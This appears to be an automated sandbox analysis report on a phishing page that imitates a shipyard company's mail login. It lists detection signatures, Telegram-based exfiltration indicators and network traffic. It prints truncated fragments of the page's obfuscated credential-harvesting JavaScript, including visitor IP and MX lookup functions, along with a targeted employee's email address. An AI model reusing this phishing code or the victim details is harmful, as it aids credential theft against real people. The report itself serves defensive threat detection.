Windows Analysis Report
https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com

Overview

General Information

Sample URL:	https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8
Analysis ID:	1571602
Infos:

Detection

HTMLPhisher

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish10

AI detected suspicious Javascript

HTML page contains obfuscated javascript

Javascript uses Clearbit API to dynamically determine company logos

Javascript uses Telegram API

Uses the Telegram API (likely for C&C communication)

HTML body contains low number of good links

HTML title does not match URL

Invalid 'copyright' link found

Invalid 'forgot password' link found

Javascript checks online IP of machine

Stores files to the Windows start menu directory

URL contains potential PII (phishing indication)

Classification

Signatures

Phishing

Yara detected HtmlPhish10

Source: Yara match	File source: 1.0.pages.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML
Source: Yara match	File source: 1.2.pages.csv, type: HTML
Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: 2.4.pages.csv, type: HTML
Source: Yara match	File source: 2.5.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_105, type: DROPPED

AI detected suspicious Javascript

Source: 0.0.id.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://copilotse.blob.core.windows.net/$web/hgyxx... High risk due to multiple suspicious indicators: heavy obfuscation (encoded variable names and strings), URL manipulation and base64 handling, DOM manipulation, and potential data exfiltration (collecting email and browser data). The code appears to be part of a credential harvesting or phishing operation.

HTML page contains obfuscated javascript

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var

Javascript uses Clearbit API to dynamically determine company logos

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var _0x57b9e6=-parseint(_0x5a2bf9(0x132))/0x1+parseint(_0x5a2bf9(0xfb))/0x2+parseint(_0x5a2bf9(0x154))/0x3(parseint(_0x5a2bf9(0x164))/0x4)+-parseint(_0x5a2bf9(0x11a))/0x5+-parseint(_0x5a2bf9(0x14d))/0x6(-parseint(_0x5a2bf9(0x16b))/0x7)+-parseint(_0x5a2bf9(0x145))/0x8(parseint(_0x5a2bf9(0x166))/0x9)+-parseint(_0x5a2bf9(0x15d))/0xa(-parseint(_0x5a2bf9(0x13e))/0xb);if(_0x57b9e6===_0x1fea61)break;else _0x4f8b72['push'](_0x4f8b72['shift']());}catch(_0x1b12d0){_0x4f8b72['push'](_0x4f8b72['shift']());}}}(_0x15ca,0x49be4),$(document)['ready'](function(){var _0xd175a8=_0xff0d,_0x34f441=0x0;initializepage(),$(_0xd175a8(0x158))[_0xd175a8(0x148)](function(){var _0x22db1d=_0xd175a8;$(_0x22db1d(0x128))[_0x22db1d(0x167)](),$(_0x22db1d(0x115))[_0x22db1d(0xf7)](''),$(_0x22db1d(0x15a))[_0x22db1d(0x13f)]({'left':0xc8,'opacity':'hide'},0x0),$(_0x22db1d(0xfc))[_0x22db1d(0x13f)]({'right':0xc8,'opacity':'show'},0x3e8);});var _0x3f547...
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var _0x57b9e6=-parseint(_0x5a2bf9(0x132))/0x1+parseint(_0x5a2bf9(0xfb))/0x2+parseint(_0x5a2bf9(0x154))/0x3(parseint(_0x5a2bf9(0x164))/0x4)+-parseint(_0x5a2bf9(0x11a))/0x5+-parseint(_0x5a2bf9(0x14d))/0x6(-parseint(_0x5a2bf9(0x16b))/0x7)+-parseint(_0x5a2bf9(0x145))/0x8(parseint(_0x5a2bf9(0x166))/0x9)+-parseint(_0x5a2bf9(0x15d))/0xa(-parseint(_0x5a2bf9(0x13e))/0xb);if(_0x57b9e6===_0x1fea61)break;else _0x4f8b72['push'](_0x4f8b72['shift']());}catch(_0x1b12d0){_0x4f8b72['push'](_0x4f8b72['shift']());}}}(_0x15ca,0x49be4),$(document)['ready'](function(){var _0xd175a8=_0xff0d,_0x34f441=0x0;initializepage(),$(_0xd175a8(0x158))[_0xd175a8(0x148)](function(){var _0x22db1d=_0xd175a8;$(_0x22db1d(0x128))[_0x22db1d(0x167)](),$(_0x22db1d(0x115))[_0x22db1d(0xf7)](''),$(_0x22db1d(0x15a))[_0x22db1d(0x13f)]({'left':0xc8,'opacity':'hide'},0x0),$(_0x22db1d(0xfc))[_0x22db1d(0x13f)]({'right':0xc8,'opacity':'show'},0x3e8);});var _0x3f547...

Javascript uses Telegram API

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var _0x57b9e6=-parseint(_0x5a2bf9(0x132))/0x1+parseint(_0x5a2bf9(0xfb))/0x2+parseint(_0x5a2bf9(0x154))/0x3(parseint(_0x5a2bf9(0x164))/0x4)+-parseint(_0x5a2bf9(0x11a))/0x5+-parseint(_0x5a2bf9(0x14d))/0x6(-parseint(_0x5a2bf9(0x16b))/0x7)+-parseint(_0x5a2bf9(0x145))/0x8(parseint(_0x5a2bf9(0x166))/0x9)+-parseint(_0x5a2bf9(0x15d))/0xa(-parseint(_0x5a2bf9(0x13e))/0xb);if(_0x57b9e6===_0x1fea61)break;else _0x4f8b72['push'](_0x4f8b72['shift']());}catch(_0x1b12d0){_0x4f8b72['push'](_0x4f8b72['shift']());}}}(_0x15ca,0x49be4),$(document)['ready'](function(){var _0xd175a8=_0xff0d,_0x34f441=0x0;initializepage(),$(_0xd175a8(0x158))[_0xd175a8(0x148)](function(){var _0x22db1d=_0xd175a8;$(_0x22db1d(0x128))[_0x22db1d(0x167)](),$(_0x22db1d(0x115))[_0x22db1d(0xf7)](''),$(_0x22db1d(0x15a))[_0x22db1d(0x13f)]({'left':0xc8,'opacity':'hide'},0x0),$(_0x22db1d(0xfc))[_0x22db1d(0x13f)]({'right':0xc8,'opacity':'show'},0x3e8);});var _0x3f547...
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var _0x57b9e6=-parseint(_0x5a2bf9(0x132))/0x1+parseint(_0x5a2bf9(0xfb))/0x2+parseint(_0x5a2bf9(0x154))/0x3(parseint(_0x5a2bf9(0x164))/0x4)+-parseint(_0x5a2bf9(0x11a))/0x5+-parseint(_0x5a2bf9(0x14d))/0x6(-parseint(_0x5a2bf9(0x16b))/0x7)+-parseint(_0x5a2bf9(0x145))/0x8(parseint(_0x5a2bf9(0x166))/0x9)+-parseint(_0x5a2bf9(0x15d))/0xa(-parseint(_0x5a2bf9(0x13e))/0xb);if(_0x57b9e6===_0x1fea61)break;else _0x4f8b72['push'](_0x4f8b72['shift']());}catch(_0x1b12d0){_0x4f8b72['push'](_0x4f8b72['shift']());}}}(_0x15ca,0x49be4),$(document)['ready'](function(){var _0xd175a8=_0xff0d,_0x34f441=0x0;initializepage(),$(_0xd175a8(0x158))[_0xd175a8(0x148)](function(){var _0x22db1d=_0xd175a8;$(_0x22db1d(0x128))[_0x22db1d(0x167)](),$(_0x22db1d(0x115))[_0x22db1d(0xf7)](''),$(_0x22db1d(0x15a))[_0x22db1d(0x13f)]({'left':0xc8,'opacity':'hide'},0x0),$(_0x22db1d(0xfc))[_0x22db1d(0x13f)]({'right':0xc8,'opacity':'show'},0x3e8);});var _0x3f547...

HTML body contains low number of good links

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: Number of links: 0
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: Number of links: 0

HTML title does not match URL

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: Title: Phillyshipyard - Mail does not match URL
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: Title: does not match URL

Invalid 'copyright' link found

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: Invalid link: Copyright 2024
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: Invalid link: Copyright 2024

Invalid 'forgot password' link found

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: Invalid link: Forgot password?
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: Invalid link: Forgot password?

Javascript checks online IP of machine

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: function handlebase64data(string) { try { return atob(string); } catch (error) { return string; } } function getvisitorip() { return new promise(function (resolve, reject) { var xhr = new xmlhttprequest(); xhr.open('get', 'https://ipinfo.io/json', true); xhr.onload = function () { if (xhr.status >= 200 && xhr.status < 300) { var response = json.parse(xhr.responsetext); resolve(response); } else { reject('failed to fetch ip address'); } }; xhr.onerror = function () { reject('failed to fetch ip address'); }; xhr.send(); }); } async function getmxrecord(domain) { try { const response = await fetch(`https://dns.google/resolve?name=${domain}&type=mx`); const data = await response.json(); if (data && data.answer && data.answer.length > 0) { const mxrecords = data.an...
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: function handlebase64data(string) { try { return atob(string); } catch (error) { return string; } } function getvisitorip() { return new promise(function (resolve, reject) { var xhr = new xmlhttprequest(); xhr.open('get', 'https://ipinfo.io/json', true); xhr.onload = function () { if (xhr.status >= 200 && xhr.status < 300) { var response = json.parse(xhr.responsetext); resolve(response); } else { reject('failed to fetch ip address'); } }; xhr.onerror = function () { reject('failed to fetch ip address'); }; xhr.send(); }); } async function getmxrecord(domain) { try { const response = await fetch(`https://dns.google/resolve?name=${domain}&type=mx`); const data = await response.json(); if (data && data.answer && data.answer.length > 0) { const mxrecords = data.an...

URL contains potential PII (phishing indication)

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: <input type="password" .../> found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: <input type="password" .../> found

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="author".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="author".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="author".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="author".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: No <meta name="author".. found

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="copyright".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="copyright".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="copyright".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="copyright".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49754 version: TLS 1.2

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: kit.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global traffic	DNS traffic detected: DNS query: stackpath.bootstrapcdn.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ka-f.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: logo.clearbit.com
Source: global traffic	DNS traffic detected: DNS query: image.thum.io
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: dns.google
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
